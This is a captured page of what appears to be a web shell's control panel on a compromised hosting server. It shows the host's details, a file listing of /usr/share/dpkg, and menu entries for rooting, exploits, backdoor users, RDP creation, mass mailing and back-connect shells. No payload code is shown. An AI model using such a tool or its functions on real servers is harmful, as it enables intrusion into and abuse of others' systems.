Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.59.182
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
dpkg /
[ HOME SHELL ]
Name
Size
Permission
Action
sh
[ DIR ]
drwxr-xr-x
abitable
362
B
-rw-r--r--
architecture.mk
643
B
-rw-r--r--
buildflags.mk
1.76
KB
-rw-r--r--
buildopts.mk
392
B
-rw-r--r--
buildtools.mk
2.63
KB
-rw-r--r--
cputable
2.06
KB
-rw-r--r--
default.mk
362
B
-rw-r--r--
no-pie-compile.specs
77
B
-rw-r--r--
no-pie-link.specs
65
B
-rw-r--r--
ostable
2.06
KB
-rw-r--r--
pie-compile.specs
97
B
-rw-r--r--
pie-link.specs
76
B
-rw-r--r--
pkg-info.mk
1.53
KB
-rw-r--r--
tupletable
2.2
KB
-rw-r--r--
vendor.mk
1.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : buildopts.mk
# This Makefile fragment (since dpkg 1.20.1) parses option arguments from # DEB_BUILD_OPTIONS, and exposes these as variables. # # Defines the following variables: # # DEB_BUILD_OPTION_PARALLEL: the argument for the parallel=N option. ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) DEB_BUILD_OPTION_PARALLEL = $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) endif
Close